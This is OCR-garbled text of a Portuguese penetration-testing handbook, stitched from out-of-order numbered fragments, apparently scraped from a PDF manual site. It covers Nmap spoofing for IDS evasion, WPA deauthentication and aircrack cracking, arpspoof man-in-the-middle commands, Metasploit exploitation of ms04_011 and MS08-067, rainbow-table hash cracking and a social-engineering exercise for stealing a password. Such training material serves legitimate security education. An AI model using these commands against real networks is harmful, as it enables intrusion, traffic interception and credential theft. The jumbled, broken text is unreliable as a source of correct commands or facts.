explora o popularidade impac
214. t gt realiza um IP spoofing fazendo com que um IDS report uma varredura sendo realizada a partir de um outro IP que n o o seu mas que definido por voc e source port lt portnumber gt gt realiza um port spoofing permitindo que seja definido no pacote de qual porta ele teoricamente foi enviado Essa t cnica explora as portas abertas no alvo para realizar varreduras que o firewall permitir por conta de suas regras As portas mais utilizadas s o DNS 53 e FTP 21 e randomize hosts gt ordena de forma aleat ria os hosts alvos de uma varredura Isso pode tornar a varredura menos bvia para sistemas de Cap tulo 11 Ignorando Prote es 130 monitoramento de rede especialmente se combinado com op es de slow timing e spoof mac lt MAC address gt gt faz um MAC spoofing atribuindo um endere o MAC definido pelo atacante para todos os frames ethernet enviados 11 3 Firewall Tester Firewall Tester FTester uma ferramenta criada para testar regras de filtragem firewalls e as capacidades Intrusion Detection System IDS A ferramenta consiste em 2 scripts perl um injetor de pacotes ftest e um sniffer passivo listening sniffer ftestd 11 3 1 Caracter sticas e firewall testing e IDS testing e Simula o de conex es reais TCP para inspecionar firewalls e IDS e Fragmenta o de IP Fragmenta o de TCP e T cnicas de evas o de IDS Download http dev inversepat
215. ta se do fato de que os SSID est o vis veis a todos na rea coberta pela rede O atacante utiliza se dessa informa o e configura um access point com o mesmo SSID para convencer os usu rios a se conectarem no access point falso Um m todo mais sofisticado ainda for ar os usu rios a se desconectar do Cap tulo 17 Ataques a Redes Sem Fio 205 access point real e ent o conectar ao access point do atacante Ferramenta para configurar um access point E l airsnarf 17 11 Contramedidas e Utilizar senhas fortes nos Access point e N o usar WEP e N o confiar em controle de acesso via MAC Address e Possuir uma pol tica de seguran a atualizada que controle as redes sem fio Cap tulo 18 Exploits 211 Cap tulo 19 Metasploit Framework 19 1 Objetivos e Entender como funciona o Metasploit e Entender o funcionamento e como utilizar o Meterpreter e Aprender como conseguir conex o direta e reversa com o alvo e Aprender a implantar backdoors atrav s do Metasploit e Aprender a comprometer uma m quina da rede interna atrav s de uma DMZ comprometida Cap tulo 19 Metasploit Framework 212 19 2 Introdu o A pesquisa de vulnerabilidades de software evoluiu muito nos ltimos anos O pesquisador de vulnerabilidades o t cnico respons vel em encontrar falhas no software que podem levar a um mal funcionamento do software ou ainda a uma poss vel falha de seguran a A vis
216. tar o comando msfconsole Interface web Embora tenha muitos detratores a interface web Metasploit pode ser extremamente til em certas circunst ncias especiais tais como apresenta es p blicas ou de trabalho em equipe Para efeito esta vers o web do Metasploit inclui seu pr prio servidor http a fim de nos dar a capacidade de acesso via browser para praticamente as mesmas caracter sticas que sua vers o console 19 5 1 Desenvolvimento do MSF A primeira vers o est vel do MSF foi lan ada em meados de 2004 Originalmente escrito em Perl Assembler e C Seus desenvolvedores veja a lista no endere o resolveram quebrar o paradigma de como os exploits eram desenvolvidos at ent o Cap tulo 19 Metasploit Framework 217 Escrever um exploit anteriormente era uma tarefa complexa e a explora o de uma vulnerabilidade exigia conhecimentos profundos em programa o especifica para cada plataforma O MSF veio para diminuir essa complexidade e fazer intenso reuso de c digo assim como faz a concep o da programa o orientada a objetos Digamos que antes do MSF o desenvolvimento dos exploits era feito no melhor estilo da programa o procedural tradicional e depois do MSF a pesquisa come ou a se basear na programa o orientada a objetos A vers o 2 x foi substitu da pela vers o 3 x totalmente reescrita na linguagem Ruby que uma linguagem O O real com caracter sticas nicas como alto nivel d
217. te contains netcraft com Results for 4linux com br Found 3 sites Site Site Report First seen Netblock os i www 4linux com br E march 2002 sago networks linux 2 netclass 4linux com br august 2005 sago networks linux sd webclass 4linux com br E july 2009 sago networks linux COPYRIGHT O NETCRAFT LTD 2010 ALL RIGHTS RESERVED J o ZeroDayScan um site que permite fazer a varredura em busca de vulnerabilidades que posam existir em sua aplica o O que mai interessante que quando realizamos a busca ele tamb m retorna no relat rio final o endere o de todos os outros dom nios hospedados no mesmo servidor Quando um atacante busca acesso um servidor WEB basta descobrir vulnerabilidades em qualquer um dos sites hospedados no mesmo e explor las para obter sucesso em seu ataque Cap tulo 16 Ataques a Servidores WEB 196 O nico empecilho para realizar um ataque desse tipo que necess rio hospedar um arquivo txt como nome de zerodayscan txt como comentado no cap tulo sobre vulnerabilidades em aplica es WEB 16 7 Contramedidas e Realizar constantes verifica es nas configura es de seguran a dos servidores web e Atualizar constantemente os servidores e Diminuir ao m ximo as informa es que s o transmitidas pelos web servers s ferramentas de fingerprinting Cap tulo 17 Ataques a Redes Sem Fio 206 Cap tulo 18 Exploits 18 1 Objetivos e Entender
218. te tela Cap tulo 19 Metasploit Framework 227 gt use windows smb ms04 011 lsass exploit ms04 011 lsass gt show targets Exploit targets Id Name Automatic Targetting 0 1 Windows 2000 English 2 Windows XP English exploit ms04 011 Agora precisamos saber o que podemos fazer com esse exploit j que o exploit a explora o da falha em si Portanto precisamos de um programa ou m dulo que utilize a falha da maneira que precisamos execute um comando rode um shell e etc esse programa ou m dulo um payload Para sabermos qual payload est dispon vel para esse exploit digite no prompt msf gt o comando show payloads e ent o a tela a seguir ser exibida com uma lista de todos os payloads compat veis com esse exploit Para definirmos o tipo de alvo que atacaremos explorando suas falhas digite set TARGET substituindo o pelo n mero de identifica o do tipo de alvo que atacaremos como mostrado numa tela anterior nesse caso s temos as op es O Cap tulo 19 Metasploit Framework 228 autom tico 1 Windows 2000 e 2 Windows XP Para sabermos o tipo de S O de nosso alvo deveremos ter pesquisado isso na fase de fingerprinting onde colhemos informa es sobre nossos hosts alvos Vamos como exemplo atacar um host que tenha como seu S O o Windows XP e queremos rodar um Shell a partir dele para termos acesso m quina Vou digitar set target 2 no prompt msf gt
219. tenha bolsas e documentos pessoais em seguran a e Teste constantemente seus dispositivos de seguran a c meras e detectores de movimento e Tenha cuidado com Shoulder Surfer s e Bloqueie o tailgating e Mantenha se atento aos engenheiros sociais e D treinamento adequado aos funcion rios principalmente os da area de seguran a 6 8 Exerc cio te rico Elabore abaixo um script de ataque de engenharia social para conseguir a senha de um usu rio Cap tulo 6 Entendendo a Engenharia Social e o No Tech Hacking 78 Cap tulo 7 Varreduras ativas passivas e furtivas de rede 79 Cap tulo 7 Varreduras ativas passivas e furtivas de rede 7 1 Objetivos e Mapear hosts ativos na rede e Obter vers es dos sistemas operacionais e Entender aquisi o de banners e Identificar os servi os em execu o Cap tulo 7 Varreduras ativas passivas e furtivas de rede 80 7 2 Varreduras Internet Control Messages Protocol ICMP O protocolo IP Internet Protocol conhecido como protocolo do melhor esfor o devido a sua caracter stica de sempre procurar o melhor caminho at uma determinada rede ou host O IP possui um fiel escudeiro um chamado ICMP Internet Control Messages Protocol e de acordo com a RFC792 o ICMP empregado quando e Quando um pacote n o consegue chegar ao destino e Quando um roteador n o consegue encaminhar um pacote e Quando um roteador descobre
220. to e tirando a m dia desses 3 informando o risco Solu o Essa ltima se o onde informamos poss veis solu es para as vulnerabilidades encontradas Cap tulo 3 Escrita de Relat rio 45 4 1 Cap tulo 4 Google Hacking Objetivos Entender o que Google Hacking Conhecer os riscos que o Google traz Aprender como usar o Google como ferramenta auxiliar para um pentest Conhecer os principais comandos do Google Aprender como encontrar buscas pr definidas utilizando o GHD Cap tulo 4 Google Hacking 46 4 2 Google Hacking Google Hacking a atividade de usar recursos de busca do site visando atacar ou proteger melhor as informa es de uma empresa As informa es dispon veis nos servidores web da empresa provavelmente estar o nas bases de dados do Google Um servidor mal configurado pode expor diversas informa es da empresa no Google N o dif cil conseguir acesso a arquivos de base de dados de sites atrav s do Google O Google possui diversos recursos que podem ser utilizados durante um teste de invas o e justamente por isso considerada a melhor ferramenta para os hackers pois permite acesso a todo e qualquer tipo de informa o que se queira Podemos usar como exemplo o recurso de cache do Google onde o mesmo armazena vers es mais antigas de todos os sites que um dia j a foram indexados por seus rob s Web Imagens V deos Mapas Not cias Orkut Gmail m
221. trar os clientes associados a um determinado Access Point Com isso basta utilizarmos o MAC Address desse cliente na nossa interface de rede que conseguiremos acessar o Access Point 17 7 WPA Brute Force Redes com WPA ainda n o possuem uma vulnerabilidade como o WEP onde conseguimos descobrir a chave ap s analisar o tr fego depois de um certo per odo de tempo Por m poss vel realizar brute force contra o hash da senha enviada durante a conex o entre um cliente v lido da rede e tentar descobrir a senha utilizada para conex o rede Vamos exemplificar o ataque usando o conjunto de ferramentas do aircrack Ap s colocar a placa novamente em modo monitor como o exemplo acima podemos executar o airodump ng airodump ng c 11 w wpa monO Onde c canal w prefixo usado no nome do arquivo que salvara os pacotes Realizando a deautentica o de um cliente conectado ao alvo pois queremos pegar a senha quando ele se reconectar aireplay ng 0 5 a 00 00 00 00 00 01 c 00 00 00 00 00 02 wlanO Onde Cap tulo 17 Ataques a Redes Sem Fio 203 0 5 op o de deautentica o enviando 5 requisi es a MAC Address do Access Point alvo c MAC Address do cliente que vamos deautenticar wlan0 nossa interface wireless Quebrando a senha capturada com o airodump ng a aircrack ng a 2 w wordlist txt wpa 01 cap Onde a Modo para for ar um d
222. trusion Alert Hep Apropos Em Ip Mouthleme 4 USER O Netiication Os E lp Achdress 192 108 5518 ses EE EB tec Address OL 4OERCI TSA Y mss Beltin Wireless Access Point Bi Network card Vil TECHNOLOGIES INC E 292266559 B Sprem Linus Debian E Sysero Group Linux kernel 24 25 21685555 Sony Te Des Namme SERVEUR A mesa Microsoft Windows NOVXPE 4 This i probebly a gstexay for the LAN 3922665587 fingerpuisting UL Pig Feenarding Enable J ERMBSSS chect udp Uptime 1745851975 202 days 1374975 0 ESTEEN a pe 1 2922685593 TEE tisqerprieting gt SW 102 168 5595 s _ wanes ss MO Tengerprishng j a a D ass MENEE Wien RE ed lc ces nd Sd band tosse 55200 check dm C pen TC Ports ity Neto List lt 3 N R 12o s R 11 0 Kols A 3 o o ah es bs TS di Oa oa yew ee vang gt 0 A A d PM aI aR Tara V PNE Fete Me Ret e val GI tron Soto View x swing View Carty oe Pago hg vim sees ggeere gt gt e of os e os ce it og o 2 e s ee Proporta x 7 frity groperter teme had vas toners de led mgt nr a Coman ne Daan remetado a wx ve s Transtera To Domain Expand completed with 3 remite Be termite trying te expend the dresin Gi fisson cenmeming te tervertmert ic Cap tulo 8 Enumera o de informa es e servi os 97 8 6 Descobrindo Vulnerabilidades 8 6 1 Nessus Nessus uma das ferramentas m
223. tulo 19 Metasploit Framework 255 No profile runs all enabled modules msf gt wmap run t Loaded auxiliary scanner http webdav website content Loaded auxiliary scanner http http version Loaded auxiliary scanner http webdav scanner Loaded auxiliary scanner http svn scanner Loaded auxiliary scanner http soap xml corte Tudo o que resta agora realizar a varredura contra nossa URL alvo msf gt wmap_run e Using ALL wmap enabled modules Launching auxiliary scanner http webdav website content WMAP SERVER against 192 168 1 204 80 Found file or directory in WebDAV response 192 168 1 204 http 192 168 1 204 Scanned 1 of 1 hosts 100 complete Launching auxiliary scanner http http version WMAP SERVER against 192 168 1 204 80 192 168 1 204 Microsoft IIS 6 0 Corte Scanned 1 of 1 hosts 100 complete Launching auxiliary scanner http dir listing WMAP DIR against 192 168 1 204 80 Scanned 1 of 1 hosts 100 complete msf gt 19 14 3 Verificando resultados Assim que a varredura tiver finalizado vamos verificar o banco de dados para Cap tulo 19 Metasploit Framework 256 ver se o wmap encontrou algo de interessante msf gt db hosts c address svcs vulns address svcs vulns 192 168 1 204 1 1 msf gt Olhando a sa da acima podemos ver que o wmap reportou uma vulne
224. ue o mesmo instala se com o Metasploit entre os arquivos organizados no subdiret rio extras de seu path de instala o Embora as medidas mencionadas nos par grafos anteriores funcionem na maioria dos casos ser bom saber que dependendo da distribui o Linux que voc est usando provavelmente vai contar com alguma facilidade adicional ao instalar Metasploit Framework com o seu gerenciador de pacotes preferido Cap tulo 19 Metasploit Framework 216 19 5 Um olhar sobre o Framework Perfeito Se voc chegou at aqui provavelmente est ansioso para testar o funcionamento de seu novo ambiente de trabalho Antes de come ar precisamos saber que o Metasploit Framework fornece nos basicamente tr s diferentes interfaces no momento de interagir com os mesmos e Command Line Interface Esta a forma correta para interagir com o Framework quando da automatiza o de testes de sequ ncias de exploits ou simplesmente nos casos em que n o precisar de uma interface interativa O utilit rio executado atrav s do comando msfcli Console Interface prov vel que seja esta a interface mais comumente utilizada devido sua utiliza o intuitiva e interativa velocidade do seu funcionamento e sua flexibilidade Sua principal caracter stica a de proporcionar um Metasploit pronto a partir do qual se pode interagir com cada aspecto do Framework Se voc quiser usar essa interface temos que execu
225. ue ser atacado e t o pouco sabe quais testes o auditor ir realizar o m todo de pen test mais realista poss vel aproximando se de um ataque real pois ambas as parte auditor e alvo n o sabem com o que ir o se deparar Afinal em um ambiente real o atacante n o sabe nada inicialmente sobre seu alvo e o alvo nunca saber qual tipo de ataque um cracker pode realizar contra sua Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 30 infraestrutura 2 3 3 Gray Box Nessa modalidade o auditor tem conhecimento parcial do alvo e o alvo sabe que ser atacado e tamb m sabe quais testes ser o realizados Aproxima se de um teste onde simulado o ataque de dentro de um ambiente completamente monitorado e controlado 2 3 4 Double Gray Box Nessa modalidade o auditor tem conhecimento parcial do alvo e o alvo sabe que ser atacado por m n o sabe quais testes ser o executados Esse o melhor m todo para simular um ataque partindo de um funcion rio insatisfeito que possui privil gios de usu rio por exemplo e procura realizar escalada de privil gios para ter acesso s informa es que seu n vel ou grupo n o possui 2 3 5 Tandem Nessa modalidade o auditor tem total conhecimento sobre o alvo o alvo sabe que ser atacado e o que ser feito durante o ataque Tamb m conhecido como caixa de cristal Esse tipo de pen test bem pr ximo de uma auditoria pois ambos est o
226. ulo 12 T cnicas de For a Bruta 152 12 9 4 Passo 3 usar o rcrack para buscar o conte do das rainbow tables O programa rcrack utilizado para acessar as rainbow tables Ele aceita apenas rainbow tables organizadas Assumindo que as rainbow tables organizadas estejam no mesmo diret rio do programa para quebrar hashes nicos a linha de comando ser E rcrack rt h aqui vai o hash para ser quebrado O primeiro par metro especifica o caminho para buscar nos arquivos das rainbow tables Os caracteres e 2 podem ser usados para especificar varios arquivos Normalmente isso leva algumas dezenas segundos para finalizar se a string existir dentro do range do charset e tamanho de strings selecionados Do contr rio leva se muito mais tempo para buscar por todas as tabelas apenas para n o encontrar nada Para quebrar m ltiplos hashs coloque todos os hashs em um arquivo de texto com um hash por linha E ent o especifique o nome do arquivo na linha de comando do programa rcrack 3 rcrack rt l arquivo com lista de hashes Se as rainbow tables que gerou usam o algoritmo Im o programa rcrack possui um suporte especial para o par metro f Um arquivo de dump de hash no formato pwdump necess rio como input para o programa rcrack O conte do do arquivo parecer com o seguinte Administrator 500 1c3a2b6d939a1021aad3b435b51404ee e24106942bf38bcf57a6a4b29016eff6
227. up with A Cap tulo 19 Metasploit Framework 250 Database changed mysql gt select address os flavor from hosts 4 address os_flavor 4 192 168 1 205 Windows 2003 R2 192 168 1 204 Windows 2003 R2 192 168 1 206 Windows XP 192 168 1 201 Windows XP 192 168 1 203 Windows XP 5 rows in set 0 00 sec mysql gt 19 13 3 Explorando com o Armitage Na varredura conduzida anteriormente podemos ver que um dos alvos est executando o S O Windows XP SP2 e ent o tentaremos executar o exploit para a vulnerabilidade MS08 067 contra o mesmo Para isso selecionamos o host que queremos atacar encontramos o exploit na lista de exploits e damos um duplo clique para carregar sua configura o ms06 0 0 vaca Attack 192 165 Microsoft Server Service Relative Path Stack Corruption _ msos 067_ ms09 050 s This module exploits a parsing flaw in the path canonicalization code of NetAPI32 dll ms10 061 sf through the Server Service This module is capable of bypassing NX on some operating netidentit aa systems and service packs The correct target must be used to prevent the Server JH Service along with a dozen others in the same process from crashing Windows XP psexec targets seem to handle multinle successful exnloitation events but 2003 taraets will LI smb relay
228. v rios documentos por terem perdido sua utilidade Os atacantes podem aproveitar essas informa es e us las para um ataque 6 4 6 Persuas o Os pr prios hackers v em a engenharia social de um ponto de vista psicol gico enfatizando como criar o ambiente psicol gico perfeito para um ataque Os m todos b sicos de persuas o s o personifica o insinua o conformidade difus o de responsabilidade e a velha amizade Independente do m todo usado o objetivo principal convencer a pessoa que dar a informa o de que o engenheiro social de fato uma pessoa a quem ela pode confiar as informa es prestadas Outro fator importante nunca pedir muita informa o de uma s vez e sim perguntar aos poucos e para pessoas diferentes a fim de manter a apar ncia de uma rela o confort vel Cap tulo 6 Entendendo a Engenharia Social e o No Tech Hacking 76 6 5 Engenharia Social Reversa Um m todo mais avan ado de conseguir informa es il citas com a engenharia social reversa Isto ocorre quando o atacante cria uma personalidade que aparece numa posi o de autoridade de modo que todos os usu rios lhe pedir o informa o Se pesquisados planejados e bem executados os ataques de engenharia social reversa permitem extrair dos funcion rios informa es muito valiosas entretanto isto requer muita prepara o e pesquisa Os tr s m todos de ataques de engenharia social reversa s o sabotagem p
229. ver mysql msf gt db_connect root toor localhost wmap msf gt load wmap WMAP 1 0 et metasploit com 2011 Successfully loaded plugin wmap msf gt help Wmap Commands Command Description wmap run Test targets Cap tulo 19 Metasploit Framework 254 wmap sites Manage sites wmap targets Manage targets corte 19 14 2 Adicionando alvos Antes de executar a varredura precisamos primeiro adicionar a URL de um novo alvo usando o par metro a com o comando wmap sites E al m disso executar o comando wmap sites l que exibir os sites dispon veis EM msf gt wmap sites h Usage wmap sites options h Display this help text a url Add site vhost url 1 List all available sites S urls level Display site structure vhost url msf gt wmap sites a dominio a partir do www ip v lido Ap s isso acrescentamos o alvo que desejamos varrer utilizando o comando wmap targets t msf gt wmap targets t dominio a partir do www ip v lido Usando o comando wmap run iniciaremos a varredura do sistema alvo Primeiro usamos o par metro t para listar os m dulos que ser o usados para varrer o sistema remoto msf gt wmap run h Usage wmap run options h Display this help text t Show all matching exploit modules e profile Launch profile test modules against all matched targets Cap
230. vo for montar o pacote para envio ela montara com o IP real do servidor de destino que ela quer acessar porem utilizar SEU endere o MAC ou seja quando este pacote passar pelo switch o mesmo encaminhar o pacote para voc E arpspoof i lt INTERFACE gt t lt IP DO ALVO gt lt IP QUE SEU ALVO VAI MAPEAR PARA SEU MAC gt arpspoof i ethO t 192 168 1 3 192 168 1 7 No exemplo acima o IP 192 168 1 3 vai adicionar atualizar a sua tabela arp com os novos dados Para o ataque ser 100 funcional preciso fazer o mesmo para o IP 192 168 1 7 e habilitar o forward de pacotes echo 1 gt proc sys net ipv4 ip_forward na sua m quina com isso o trafego entre tais hosts passar por voc e voc poder sniffar e ou fazer ataques de MITM Man In The Middle Comandos E arpspoof i eth0 t 192 168 1 3 192 168 1 7 arpspoof i eth0 t 192 168 1 7 192 168 1 3 echo 1 gt proc sys net ipv4 ip_forward 15 5 Principais protocolos vulner veis a sniffer Os protocolos citados abaixo s o mais vulner veis a a o de um Sniffer por passarem senhas em texto aberto Logo se um atacante tiver acesso a LAN poder facilmente interceptar senhas e ganhar v rios acesso e Telnet e Rlogin e HTTP Cap tulo 15 T cnicas de Sniffing 183 e SMTP e NNTP e POP e FIP e IMAP 15 6 Principais Ferramentas 15 6 1 Dsniff Dsniff possui diversas ferramentas em seu pacote de dados
Download Pdf Manuals
Related Search